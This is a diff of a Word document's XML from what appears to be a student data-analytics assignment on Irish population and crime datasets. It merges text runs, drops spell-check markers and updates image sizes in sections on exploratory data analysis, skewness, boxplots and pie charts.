-        <w:t xml:space="preserve">() has been used in this </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>dataframe</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>The method .dropna() has been used in this dataframe.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5740,7 +5604,6 @@
         </w:rPr>
         <w:t xml:space="preserve">EDA allows us to gain an overall understanding of the </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="en-US"/>
@@ -5763,14 +5626,7 @@
         <w:rPr>
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t>rames</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>, detect relationships between variables, and examine the distribution of the variables of interest. In this study, the exploratory data analysis (EDA) step will be used to perform both statistical analysis and visualization tasks.</w:t>
+        <w:t>rames, detect relationships between variables, and examine the distribution of the variables of interest. In this study, the exploratory data analysis (EDA) step will be used to perform both statistical analysis and visualization tasks.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5867,10 +5723,10 @@
                                 <w:noProof/>
                               </w:rPr>
                               <w:drawing>
-                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22881333" wp14:editId="42C698C5">
-                                  <wp:extent cx="2111101" cy="1228725"/>
-                                  <wp:effectExtent l="0" t="0" r="3810" b="0"/>
-                                  <wp:docPr id="223258091" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A5AD777" wp14:editId="5FD487FA">
+                                  <wp:extent cx="2048774" cy="1196788"/>
+                                  <wp:effectExtent l="0" t="0" r="8890" b="3810"/>
+                                  <wp:docPr id="569871312" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                                   <wp:cNvGraphicFramePr>
                                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                                   </wp:cNvGraphicFramePr>
@@ -5878,7 +5734,7 @@
                                     <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                                       <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                                         <pic:nvPicPr>
-                                          <pic:cNvPr id="223258091" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+                                          <pic:cNvPr id="569871312" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                                           <pic:cNvPicPr/>
                                         </pic:nvPicPr>
                                         <pic:blipFill>
@@ -5890,7 +5746,7 @@
                                         <pic:spPr>
                                           <a:xfrm>
                                             <a:off x="0" y="0"/>
-                                            <a:ext cx="2117800" cy="1232624"/>
+                                            <a:ext cx="2068403" cy="1208254"/>
                                           </a:xfrm>
                                           <a:prstGeom prst="rect">
                                             <a:avLst/>
@@ -5935,10 +5791,10 @@
                           <w:noProof/>
                         </w:rPr>
                         <w:drawing>
-                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22881333" wp14:editId="42C698C5">
-                            <wp:extent cx="2111101" cy="1228725"/>
-                            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
-                            <wp:docPr id="223258091" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A5AD777" wp14:editId="5FD487FA">
+                            <wp:extent cx="2048774" cy="1196788"/>
+                            <wp:effectExtent l="0" t="0" r="8890" b="3810"/>
+                            <wp:docPr id="569871312" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                             <wp:cNvGraphicFramePr>
                               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                             </wp:cNvGraphicFramePr>
@@ -5946,7 +5802,7 @@
                               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                                   <pic:nvPicPr>
-                                    <pic:cNvPr id="223258091" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+                                    <pic:cNvPr id="569871312" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                                     <pic:cNvPicPr/>
                                   </pic:nvPicPr>
                                   <pic:blipFill>
@@ -5958,7 +5814,7 @@
                                   <pic:spPr>
                                     <a:xfrm>
                                       <a:off x="0" y="0"/>
-                                      <a:ext cx="2117800" cy="1232624"/>
+                                      <a:ext cx="2068403" cy="1208254"/>
                                     </a:xfrm>
                                     <a:prstGeom prst="rect">
                                       <a:avLst/>
@@ -6035,8 +5891,8 @@
                                 <w:noProof/>
                               </w:rPr>
                               <w:drawing>
-                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58D01DD5" wp14:editId="742FE6B8">
-                                  <wp:extent cx="3795713" cy="1244170"/>
+                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58D01DD5" wp14:editId="65114637">
+                                  <wp:extent cx="3742765" cy="1226814"/>
                                   <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                   <wp:docPr id="662081251" name="Picture 1" descr="A screenshot of a graph&#10;&#10;Description automatically generated"/>
                                   <wp:cNvGraphicFramePr>
@@ -6057,7 +5913,7 @@
                                         <pic:spPr bwMode="auto">
                                           <a:xfrm>
                                             <a:off x="0" y="0"/>
-                                            <a:ext cx="3820520" cy="1252301"/>
+                                            <a:ext cx="3777821" cy="1238305"/>
                                           </a:xfrm>
                                           <a:prstGeom prst="rect">
                                             <a:avLst/>
@@ -6106,8 +5962,8 @@
                           <w:noProof/>
                         </w:rPr>
                         <w:drawing>
-                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58D01DD5" wp14:editId="742FE6B8">
-                            <wp:extent cx="3795713" cy="1244170"/>
+                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58D01DD5" wp14:editId="65114637">
+                            <wp:extent cx="3742765" cy="1226814"/>
                             <wp:effectExtent l="0" t="0" r="0" b="0"/>
                             <wp:docPr id="662081251" name="Picture 1" descr="A screenshot of a graph&#10;&#10;Description automatically generated"/>
                             <wp:cNvGraphicFramePr>
@@ -6128,7 +5984,7 @@
                                   <pic:spPr bwMode="auto">
                                     <a:xfrm>
                                       <a:off x="0" y="0"/>
-                                      <a:ext cx="3820520" cy="1252301"/>
+                                      <a:ext cx="3777821" cy="1238305"/>
                                     </a:xfrm>
                                     <a:prstGeom prst="rect">
                                       <a:avLst/>
@@ -6187,14 +6043,12 @@
         </w:rPr>
         <w:t xml:space="preserve">, the </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
         <w:t>population_df</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="en-US"/>
@@ -6205,21 +6059,7 @@
         <w:rPr>
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">  and </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>crime_df</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">  and crime_df </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6300,25 +6140,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">This process will be performed on </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Jupyter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> notebook:</w:t>
+        <w:t>This process will be performed on Jupyter notebook:</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6338,9 +6160,8 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>MSC_DA_CA1_Jose_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t>MSC_DA_CA1_Jose_Mario</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6349,7 +6170,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Mario</w:t>
+        <w:t>.ipynb</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6359,7 +6180,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>.ipynb</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6374,30 +6195,71 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>and it was called</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>and</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> it was called</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> “</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>P</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>hase 0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - EDA </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6405,66 +6267,6 @@
           <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> “</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>P</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>hase 0</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - EDA </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>”</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
         <w:t>Skewness:</w:t>
@@ -6617,41 +6419,13 @@
         </w:rPr>
         <w:t xml:space="preserve">or </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>distplots</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> can be used to visualize skewness. However, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>distplots</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> are generally considered to be a better option because they provide more information about the shape of the data distribution.</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>distplots can be used to visualize skewness. However, distplots are generally considered to be a better option because they provide more information about the shape of the data distribution.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6739,7 +6513,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Figure 01: </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6748,9 +6521,8 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>distplot</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve">distplot </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6759,9 +6531,8 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t>-</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6770,7 +6541,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>-</w:t>
+        <w:t xml:space="preserve">  </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6780,28 +6551,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Skewness</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">Skewness </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6997,7 +6747,6 @@
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7009,7 +6758,6 @@
         </w:rPr>
         <w:t>BoxPlot</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7166,19 +6914,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve">dentify </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>outliers</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>dentify outliers</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7318,9 +7055,8 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t xml:space="preserve">: Boxplot  </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7329,28 +7065,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Boxplot  </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> population by region</w:t>
+        <w:t>- population by region</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7438,15 +7153,7 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Outliers are data points that significantly differ from </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>the majority of</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> observations in a dataset. They can be caused by various factors, including measurement errors, data entry errors, or natural variation in the population.</w:t>
+        <w:t>Outliers are data points that significantly differ from the majority of observations in a dataset. They can be caused by various factors, including measurement errors, data entry errors, or natural variation in the population.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7531,12 +7238,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:tabs>
           <w:tab w:val="left" w:pos="916"/>
           <w:tab w:val="left" w:pos="1832"/>
@@ -7798,7 +7499,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77F6BDB8" wp14:editId="11A0B567">
             <wp:extent cx="6193155" cy="1657350"/>
@@ -7908,6 +7608,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Insights:</w:t>
       </w:r>
     </w:p>
@@ -8005,27 +7706,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve">Pie charts use a 1D array as input, so we need to convert the data variable to a 1D array using the NumPy </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>ravel(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>) function.</w:t>
+        <w:t>Pie charts use a 1D array as input, so we need to convert the data variable to a 1D array using the NumPy ravel() function.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8218,7 +7899,6 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">From the pie chart, we can observe that the biggest region in population Is the Dublin </w:t>
       </w:r>
       <w:r>
@@ -8375,6 +8055,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Overall, </w:t>
       </w:r>
       <w:r>
@@ -8384,27 +8065,110 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve">the population of Ireland is becoming more concentrated in the Dublin region. This may be due to </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
+        <w:t>the population of Ireland is becoming more concentrated in the Dublin region. This may be due to a number of factors, such as job opportunities, educational opportunities, and cultural amenities.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t>a number of</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve"> factors, such as job opportunities, educational opportunities, and cultural amenities.</w:t>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>Exploring Crime Rate dataset:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>We can see the top 10 most common type of offenc</w:t>
+      </w:r>
+      <w:r>
+        <w:t>e:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
